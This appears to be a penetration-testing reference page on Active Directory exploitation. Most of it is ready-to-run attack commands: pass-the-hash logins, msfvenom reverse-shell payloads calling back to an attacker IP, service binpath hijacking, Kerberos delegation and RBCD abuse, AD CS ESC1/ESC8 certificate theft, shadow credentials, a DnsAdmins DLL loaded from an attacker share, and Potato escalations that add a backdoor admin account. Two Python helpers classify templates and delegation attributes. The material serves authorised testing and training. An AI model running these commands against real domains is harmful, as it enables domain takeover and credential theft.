05 / Exploitation

Exploitation

Leverage found credentials or discovered vulnerabilities to gain access — initial foothold or privilege escalation. Covers gaining a shell, abusing AD permissions and exploiting certificate vulnerabilities.


Exploitation Quick Reference

BloodHound findings → approach
Finding                      Approach
Server Operators group       Modify a service binpath → reverse shell as the service account (usually SYSTEM)
AllowedToDelegate            getST.py -impersonate Administrator → service ticket for an allowed SPN
ESC1 (AD CS)                 certipy-ad req / auth → NT hash of the impersonated account
GenericAll on user           ForceChangePassword (noisy; shadow credentials or a targeted Kerberoast are quieter)
GenericAll on group          Add yourself to the group (Domain Admins if that is the group)
Unconstrained Delegation     Wait for, or coerce, a DC authentication to the host and dump its TGT
SeImpersonatePrivilege       GodPotato / PrintSpoofer → SYSTEM

Gaining Access with Credentials

evil-winrm / xfreerdp / psexec
evil-winrm -i $TARGET_IP -u $USERNAME -p $PASSWORD      # WinRM (5985)
xfreerdp /u:$USERNAME /p:$PASSWORD /v:$TARGET_IP        # RDP (3389)
wmiexec.py $DOMAIN/$USERNAME:$PASSWORD@$TARGET_IP       # WMI (135)
smbexec.py $DOMAIN/$USERNAME:$PASSWORD@$TARGET_IP       # SMB (445)
psexec.py $DOMAIN/$USERNAME:$PASSWORD@$TARGET_IP        # SMB (445)
Pass-the-Hash — authenticate with the NT hash instead of the password (impacket's -hashes takes LMHASH:NTHASH; the LM half stays empty, hence the leading colon)
evil-winrm -i $TARGET_IP -u Administrator -H NTLMHASH
psexec.py Administrator@$TARGET_IP -hashes :NTLMHASH
wmiexec.py $DOMAIN/Administrator@$TARGET_IP -hashes :NTLMHASH

Server Operators — Service Binpath Abuse

sc.exe
1. Create a reverse shell payload
msfvenom -p windows/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4444 -f exe -o rce.exe
2. Start a listener
nc -lvnp 4444
3. Upload rce.exe to the target via evil-winrm (it lands in the current remote directory; use that path below)
upload rce.exe
4. List services and pick a non-critical one whose configuration you are allowed to change (sc.exe answers "Access is denied" otherwise)
services
5. Point the service's binpath at the payload (sc.exe requires the space after binpath=)
sc.exe config cfn-hup binpath= "C:\Users\j.rock\Desktop\rce.exe"
6. Start the service: the shell comes back on port 4444 as the service account (LocalSystem for most services). If the service is already running, stop it first. The start reports a timeout because rce.exe does not talk to the Service Control Manager, but the connection is already up. Restore the original binpath when you are done.
sc.exe start cfn-hup

AllowedToDelegate — Impersonate Administrator

getST.py / wmiexec.py
Linux — request a service ticket as Administrator
# 1. Make the target's FQDN resolve: the host in the SPN must match what Kerberos sees
echo "$TARGET_IP haystack.domain.local" | sudo tee -a /etc/hosts

# 2. S4U2Self + S4U2Proxy via getST.py: a service ticket for the allowed SPN, issued for Administrator
getST.py -spn "cifs/haystack.domain.local" -impersonate "Administrator" \
  "$DOMAIN/SVC_ACCOUNT:$PASSWORD" -dc-ip $DC_IP
# or via a computer account that has msDS-AllowedToDelegateTo set:
getST.py -spn host/<dc_fqdn> "$DOMAIN/<computer_account>:<computer_pass>" -impersonate Administrator -dc-ip $DC_IP

# 3. Point Kerberos tooling at the saved ccache (getST.py prints the exact filename it wrote)
export KRB5CCNAME=Administrator@cifs_haystack.domain.local@DOMAIN.LOCAL.ccache

# 4. Get a shell as Administrator; use the FQDN, not the IP, so the ticket's SPN matches
wmiexec.py -k -no-pass Administrator@haystack.domain.local
Windows — Rubeus constrained delegation
# 1. Request a TGT for the service account
Rubeus.exe asktgt /user:svc_account /password:PASSWORD /enctype:aes256 /outfile:svc.kirbi

# 2. S4U2Self + S4U2Proxy: request a service ticket for the allowed SPN as Administrator and inject it
Rubeus.exe s4u /ticket:svc.kirbi /impersonateuser:Administrator \
  /msdsspn:cifs/TARGET.domain.local /ptt
Two things to verify in BloodHound before relying on this: the delegating account needs TRUSTED_TO_AUTH_FOR_DELEGATION (protocol transition), otherwise S4U2Self returns a non-forwardable ticket and S4U2Proxy is refused, and getST.py then needs a ticket the user actually presented (-additional-ticket); and the impersonated account must not be in Protected Users or marked "sensitive and cannot be delegated". If msDS-AllowedToDelegateTo lists only another service class (http/ or host/ on the same host), the class in the issued ticket can still be rewritten to cifs (Rubeus /altservice, getST.py -altservice) because it is not covered by the ticket's encryption.

ESC1 — Certificate Privilege Escalation

certipy-ad
1. Find vulnerable templates (ESC1 means: enrollee supplies the subject, a client-authentication EKU, no manager approval, no required signatures, and Enroll rights for a low-privileged principal)
certipy-ad find -u "$USERNAME@$DOMAIN" -p "$PASSWORD" -dc-ip $DC_IP -vulnerable -stdout
grep -iE "vulnerable|esc" 20260313154214_Certipy.txt  # without -stdout the output goes to a timestamped file like this one
2. Request a certificate with Administrator's UPN in the SAN (ESC1); -ca and -target come from the find output, and -target is the CA host, not the domain
certipy-ad req -u "$USERNAME@$DOMAIN" -p "$PASSWORD" \
  -ca NAAM-CA -target $CA_HOST \
  -template ServerAuth -upn Administrator@$DOMAIN
3. Authenticate with the certificate (PKINIT) → a TGT in a .ccache plus the account's NT hash
certipy-ad auth -pfx administrator.pfx -dc-ip $DC_IP
4. Use the hash
wmiexec.py -hashes :NTLMHASH $DOMAIN/Administrator@$TARGET_IP
If the DCs enforce strong certificate mapping (KB5014754), a certificate that is not bound to the account's SID can be rejected at step 3; certipy prints the KDC error, so check that before assuming the template is safe.
ESC8 — NTLM relay to AD CS web enrollment (the relay target is the CA's /certsrv; coerce a DC to authenticate to your host with PetitPotam or the printer bug, and the relayed DC$ is issued a DomainController certificate that certipy-ad auth turns into a DC TGT for DCSync)
ntlmrelayx.py -t "http://$CA_HOST/certsrv/certfnsh.asp" \
  -smb2support --adcs --template "DomainController"
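The conditions certipy-ad find evaluates for ESC1, as an added example (not the page's or certipy's code) written over template attributes as they come out of LDAP: the attribute names, flag bits and EKU OIDs are the documented ones, while the three template records below are constructed for the demo (ServerAuth mirrors the page's example; User and WebServer carry the values of the stock templates).

```python
# Attribute bits and OIDs from the AD CS certificate-template schema.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # in msPKI-Enrollment-Flag: "CA certificate manager approval"

CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def allows_client_auth(ekus):
    """An empty pKIExtendedKeyUsage means 'any purpose', which PKINIT accepts as well."""
    return not ekus or bool(set(ekus) & CLIENT_AUTH_EKUS)


def esc1_blockers(template, published_templates):
    """Return the ESC1 conditions this template fails; an empty list means it is abusable."""
    blockers = []
    if template["name"] not in published_templates:
        blockers.append("not published on any enterprise CA")
    if not template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        blockers.append("enrollee cannot supply the subject/SAN")
    if not allows_client_auth(template["pKIExtendedKeyUsage"]):
        blockers.append("no client-authentication EKU")
    if template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        blockers.append("manager approval required")
    if template["msPKI-RA-Signature"] > 0:
        blockers.append("authorized signature(s) required")
    if not set(template["enroll"]) & LOW_PRIV_PRINCIPALS:
        blockers.append("no low-privileged principal has Enroll rights")
    return blockers


def is_esc1(template, published_templates):
    return not esc1_blockers(template, published_templates)


# Constructed sample: the templates a `find` would list and the set a CA publishes.
PUBLISHED = {"ServerAuth", "User", "WebServer"}
TEMPLATES = {
    "ServerAuth": {  # the page's example: custom template, subject from the request, Domain Users enroll
        "name": "ServerAuth",
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": 0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1", "1.3.6.1.5.5.7.3.2"],  # Server Auth + Client Auth
        "enroll": ["Domain Users", "Domain Admins"],
    },
    "User": {  # stock template: subject and UPN are built from AD, so no SAN control
        "name": "User",
        "msPKI-Certificate-Name-Flag": 0xA6000000,
        "msPKI-Enrollment-Flag": 0x29,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
        "enroll": ["Domain Users"],
    },
    "WebServer": {  # stock template: enrollee supplies the subject, but Server Auth only and admins enroll
        "name": "WebServer",
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": 0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
        "enroll": ["Domain Admins", "Enterprise Admins"],
    },
}


def vulnerable_templates(templates=TEMPLATES, published=PUBLISHED):
    return sorted(name for name, t in templates.items() if is_esc1(t, published))


if __name__ == "__main__":
    for name, t in TEMPLATES.items():
        why = "; ".join(esc1_blockers(t, PUBLISHED)) or "all ESC1 conditions met"
        print(f"{name:<12} ESC1={is_esc1(t, PUBLISHED)!s:<5} {why}")
```

The WebServer case is the one people misread: enrollee-supplies-subject alone is not ESC1, the template also has to let you authenticate with the result (a client-auth EKU, or none at all) and let a principal you control enroll. Conversely, a template with no EKU at all passes the check, which is why "empty pKIExtendedKeyUsage" shows up in audit findings.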

GenericAll / ACL Abuse

net rpc / PowerShell / dacledit
ForceChangePassword — reset the user's password via net rpc (destructive and visible to the user; with GenericAll, shadow credentials or a targeted Kerberoast are the quieter options)
net rpc password "TARGETUSER" "NewPass123!" -U "$DOMAIN/$USERNAME%$PASSWORD" -S $TARGET_IP
Via PowerShell (RSAT ActiveDirectory module; the new password must satisfy the domain password policy)
$Password = ConvertTo-SecureString "NewPass123!" -AsPlainText -Force
Set-ADAccountPassword -Identity "TARGETUSER" -Reset -NewPassword $Password
Add yourself to Domain Admins (GenericAll or GenericWrite on the group, i.e. write access to its member attribute)
Add-ADGroupMember -Identity "Domain Admins" -Members $USERNAME
Grant yourself DCSync rights (WriteDACL on the domain object; with WriteOwner, take ownership first and then grant yourself WriteDACL; PowerView cmdlet)
Add-DomainObjectAcl -TargetIdentity "$DOMAIN" -PrincipalIdentity $USERNAME -Rights DCSync
Edit a DACL (Linux — dacledit.py; -principal is who receives the rights, -target the object being modified, and the credentials go last without a host)
dacledit.py -action write -rights FullControl -principal $USERNAME -target <target_object> \
  "$DOMAIN/$USERNAME:$PASSWORD" -dc-ip $TARGET_IP
Change an object's owner (Linux — owneredit.py; as owner you can then write the DACL with dacledit.py)
owneredit.py -action write -new-owner $USERNAME -target <object> \
  "$DOMAIN/$USERNAME:$PASSWORD" -dc-ip $TARGET_IP
Add a user to a group via LDAP (both arguments are distinguished names)
ldeep ldap -u $USERNAME -p $PASSWORD -d $DOMAIN \
  -s ldap://$DC_IP add_to_group \
  "CN=$USERNAME,DC=..." "CN=Domain Admins,DC=..."

Unconstrained Delegation — TGT Capture

Rubeus / mimikatz
If you can execute code on the unconstrained host (local admin or SYSTEM is needed to read LSASS), watch for TGTs arriving with incoming authentications
Rubeus.exe monitor /interval:5 /nowrap
Rather than waiting, coerce a DC to authenticate to the host (printer bug / PetitPotam); its machine-account TGT then shows up in the monitor output
Dump cached TGTs
Rubeus.exe dump /service:krbtgt /nowrap
Rubeus.exe dump /luid:0xdeadbeef /nowrap   # one specific logon session
Export via mimikatz
privilege::debug
sekurlsa::tickets /export
Use the ticket (Pass-the-Ticket); a DC machine-account TGT is enough for DCSync
Rubeus.exe ptt /ticket:BASE64TICKET
export KRB5CCNAME=/path/to/ticket.ccache   # on Linux, convert an exported .kirbi with impacket's ticketConverter.py first

RBCD — Resource-Based Constrained Delegation

addcomputer.py / rbcd.py / getST.py
1. Create a machine account (only if ms-DS-MachineAccountQuota > 0; otherwise use an account with an SPN that you already control)
addcomputer.py -computer-name 'ATTACKPC$' -computer-pass 'Pass123!' \
  "$DOMAIN/$USERNAME:$PASSWORD" -dc-ip $DC_IP
2. Write msDS-AllowedToActOnBehalfOfOtherIdentity on the target (needs GenericAll, GenericWrite, WriteDacl or ownership of TARGET$)
rbcd.py -delegate-from 'ATTACKPC$' -delegate-to 'TARGET$' \
  -action write "$DOMAIN/$USERNAME:$PASSWORD" -dc-ip $DC_IP
3. Authenticate as your machine account and request a service ticket for the target as Administrator (S4U2Self + S4U2Proxy)
getST.py -spn "cifs/TARGET.domain.local" -impersonate "Administrator" \
  "$DOMAIN/ATTACKPC\$:Pass123!" -dc-ip $DC_IP
export KRB5CCNAME=Administrator@cifs_TARGET.domain.local@DOMAIN.LOCAL.ccache
wmiexec.py -k -no-pass Administrator@TARGET.domain.local
The impersonated account must not be in Protected Users or marked "sensitive and cannot be delegated"; if Administrator is, pick another local admin of the target. Remove the entry afterwards (rbcd.py -action remove).
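The three delegation cases on this page (AllowedToDelegate, unconstrained delegation and RBCD) decided from raw account attributes, as an added example that is not part of the original page. It classifies constructed LDAP-style records using the documented userAccountControl bits, flags the two conditions that make getST.py -impersonate fail quietly (no protocol transition on the delegating account, and a victim marked sensitive or in Protected Users), and lists which cifs/ SPNs become reachable through the altservice trick. Representing msDS-AllowedToActOnBehalfOfOtherIdentity as a list of names instead of a binary security descriptor is an assumption for the demo.

```python
# userAccountControl bits (ADS_USER_FLAG_ENUM)
TRUSTED_FOR_DELEGATION = 0x00080000          # unconstrained delegation
NOT_DELEGATED = 0x00100000                   # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000  # constrained delegation with protocol transition
NORMAL_ACCOUNT, WORKSTATION_TRUST_ACCOUNT = 0x0200, 0x1000
PROTECTED_USERS = "Protected Users"


def classify_delegation(account):
    """Outbound delegation an account may perform, from userAccountControl and msDS-AllowedToDelegateTo."""
    uac = account["userAccountControl"]
    allowed_to = list(account.get("msDS-AllowedToDelegateTo", []))
    if uac & TRUSTED_FOR_DELEGATION:
        # Every TGT that authenticates to this host is cached in its LSASS (Rubeus monitor / dump).
        return {"kind": "unconstrained", "spns": [], "s4u2self_forwardable": None}
    if allowed_to:
        # Without protocol transition, S4U2Self returns a non-forwardable ticket and S4U2Proxy is
        # refused: getST.py -impersonate then needs a ticket the user really presented (-additional-ticket).
        return {"kind": "constrained", "spns": allowed_to,
                "s4u2self_forwardable": bool(uac & TRUSTED_TO_AUTH_FOR_DELEGATION)}
    return {"kind": "none", "spns": [], "s4u2self_forwardable": None}


def rbcd_delegators(target):
    """Accounts allowed to delegate TO this computer (inbound); this is what rbcd.py -action write adds."""
    return list(target.get("msDS-AllowedToActOnBehalfOfOtherIdentity", []))


def can_be_impersonated(user):
    """S4U2Proxy and RBCD both fail for sensitive / Protected Users accounts: the KDC refuses delegable tickets."""
    if user["userAccountControl"] & NOT_DELEGATED:
        return False
    return PROTECTED_USERS not in user.get("memberOf", [])


def alt_service_targets(spns, service="cifs"):
    """SPNs reachable with the wanted service class. The KDC checks the host during S4U2Proxy, but the
    service class in the issued ticket's sname is outside the encrypted part and can be rewritten
    (Rubeus /altservice, getST.py -altservice), so http/X or host/X is as good as cifs/X."""
    hosts = {spn.split("/", 1)[1] for spn in spns if "/" in spn}
    return sorted(f"{service}/{h}" for h in hosts)


# Constructed directory entries (assumption: SIDs in the RBCD descriptor already resolved to names).
ACCOUNTS = {
    "SVC_ACCOUNT": {"userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
                    "msDS-AllowedToDelegateTo": ["cifs/haystack.domain.local"]},
    "svc_web": {"userAccountControl": NORMAL_ACCOUNT,
                "msDS-AllowedToDelegateTo": ["http/web01.domain.local"]},
    "WEB01$": {"userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_FOR_DELEGATION},
    "TARGET$": {"userAccountControl": WORKSTATION_TRUST_ACCOUNT, "dNSHostName": "TARGET.domain.local",
                "msDS-AllowedToActOnBehalfOfOtherIdentity": ["ATTACKPC$"]},
    "Administrator": {"userAccountControl": NORMAL_ACCOUNT, "memberOf": ["Domain Admins"]},
    "da_sensitive": {"userAccountControl": NORMAL_ACCOUNT | NOT_DELEGATED, "memberOf": ["Domain Admins"]},
    "da_protected": {"userAccountControl": NORMAL_ACCOUNT, "memberOf": ["Domain Admins", PROTECTED_USERS]},
}


def impersonation_paths(accounts, victim="Administrator"):
    """For each account that can impersonate `victim` via S4U: the cifs/ SPNs it can get a ticket for."""
    if not can_be_impersonated(accounts[victim]):
        return {}
    paths = {}
    for name, acc in accounts.items():
        info = classify_delegation(acc)
        if info["kind"] == "constrained" and info["s4u2self_forwardable"]:
            paths[name] = alt_service_targets(info["spns"])
        for delegator in rbcd_delegators(acc):  # RBCD: the delegator needs no flags of its own
            paths.setdefault(delegator, []).append(f"cifs/{acc['dNSHostName']}")
    return paths


if __name__ == "__main__":
    for name, acc in ACCOUNTS.items():
        print(f"{name:<14} {classify_delegation(acc)}  rbcd-from={rbcd_delegators(acc)}")
    print("paths to Administrator:", impersonation_paths(ACCOUNTS))
    print("paths to da_protected: ", impersonation_paths(ACCOUNTS, "da_protected"))
```

svc_web is the case to notice: BloodHound draws an AllowedToDelegate edge for it, yet getST.py -impersonate alone will not work because the account lacks protocol transition; and WEB01$ does not appear in the S4U paths at all, since unconstrained delegation is abused by capturing tickets on the host, not by requesting them.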

Shadow Credentials (GenericWrite on user/computer)

pywhisker / certipy
Via pywhisker (Linux) — adds a key credential to the target's msDS-KeyCredentialLink and writes a .pfx; authenticate with it using PKINITtools (gettgtpkinit.py), then getnthash.py for the NT hash
pywhisker.py -d $DOMAIN -u $USERNAME -p $PASSWORD \
  --target <target_user> --action add
Via certipy shadow (Linux) — does the whole chain: adds the key credential, authenticates with PKINIT, returns the NT hash and removes the key credential again
certipy shadow auto -u $USERNAME@$DOMAIN -p $PASSWORD -account <target_user>
Machine account writing its own key credential (a computer's Kerberos ticket, e.g. captured via unconstrained delegation or relayed to LDAP, is enough because the account may write its own msDS-KeyCredentialLink)
certipy shadow auto -u '<machine$>'@$DOMAIN -k -account '<machine$>'
Requires a DC that supports PKINIT, i.e. a Windows Server 2016 or later DC holding a certificate; without one the key credential is written but no TGT can be obtained from it.

DNS Admin DLL Injection

msfvenom / dnscmd
Requires membership in DnsAdmins (or write access to the DNS server object); the DLL is loaded by dns.exe as SYSTEM on the DNS server, which is usually a DC
# 1. Create the malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4444 -f dll -o evil.dll

# 2. Serve the DLL from an SMB share (the argument is the directory that contains evil.dll)
smbserver.py share /path/to/dll_dir -smb2support

# 3. Point the DNS server at your DLL (this sets ServerLevelPluginDll under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters)
dnscmd.exe DNSServer /config /serverlevelplugindll \\$ATTACKER_IP\share\evil.dll

# 4. Restart the DNS service — the DLL loads as SYSTEM (have the listener running first)
sc \\DNSServer stop dns
sc \\DNSServer start dns
Cleanup: delete the ServerLevelPluginDll registry value and restart the service once more, otherwise DNS on the DC keeps loading your DLL on every start.

Potato Exploits (SeImpersonatePrivilege)

GodPotato / PrintSpoofer
Check privileges first: SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is enough, and service accounts such as IIS application pools and MSSQL usually have it
whoami /priv
GodPotato (Windows Server 2012 through 2022, Windows 8 through 11; use the build for the .NET Framework version present on the target)
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "cmd /c net user hacker Pass123! /add && net localgroup administrators hacker /add"
PrintSpoofer (Windows 10 / Server 2016 and 2019; needs the Print Spooler service running)
PrintSpoofer.exe -i -c cmd
RoguePotato (needs a redirector on your host, e.g. socat, forwarding TCP 135 to the port given with -l, and the target must be able to reach it)
RoguePotato.exe -r $ATTACKER_IP -e "cmd.exe" -l 9999
JuicyPotato (older — Windows Server 2016 and Windows 10 before 1809; the CLSID must be one that is valid on the target's OS version)
JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {CLSID}